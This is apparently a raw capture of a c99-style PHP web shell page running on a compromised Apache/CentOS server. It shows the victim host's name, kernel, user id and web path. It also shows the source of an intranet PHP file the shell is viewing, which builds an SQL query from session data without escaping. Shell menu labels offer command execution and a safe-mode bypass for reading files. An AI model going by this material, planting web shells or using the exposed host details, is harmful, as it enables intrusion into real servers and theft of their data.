Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/info/ drwxr-xr-x | |
| Viewing file: Select action/file-type: <?php
require_once "infosys_global.php";
require_once "${_MOD_PATH}mod_tplutils.php";
require_once "${_CLASS_PATH}clsConnection.php";
require_once "${_CLASS_PATH}clsDB.php";
require_once "${_UMS_PATH}clsUser.php";
setnocache();
session_start();
if (logged_in()) {
$oU = &$_SESSION["oU"];
$UsID = $oU->userID;
if (!isset($_SESSION["ADDIN_OWNER"])) {
$oC = new clsConnection($GLOBALS["DBHOST"], $GLOBALS["DBNAME_UMS"], $GLOBALS["DBUSER_UMS"], $GLOBALS["DBPASS_UMS"]);
if ($oC->c && $oC->errmsg == "") {
$_SESSION["ADDIN_OWNER"] = array();
$db = $GLOBALS["DBNAME_UMS"];
foreach ($GLOBALS["_ADDIN_WGOWNER"] as $key => $value) {
$ownerqry = "select umusergroup.* from $db.umusergroup where umusergroup.UgUsID = $UsID and umusergroup.UgGpID = $value";
$ownres = mysql_query($ownerqry, $oC->c);
if (mysql_num_rows($ownres) > 0)
$_SESSION["ADDIN_OWNER"][$key] = true;
else
$_SESSION["ADDIN_OWNER"][$key] = false;
}
}
}
ob_start("addinURLLink");
} else {
$full_url = $GLOBALS["_PROTOCOL"] . $GLOBALS["_INFO_INDEX"];
#header("Location: $full_url");
?>
<script>window.location.href='<? echo $full_url; ?>';</script>
<?
}
?>
|
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]-- |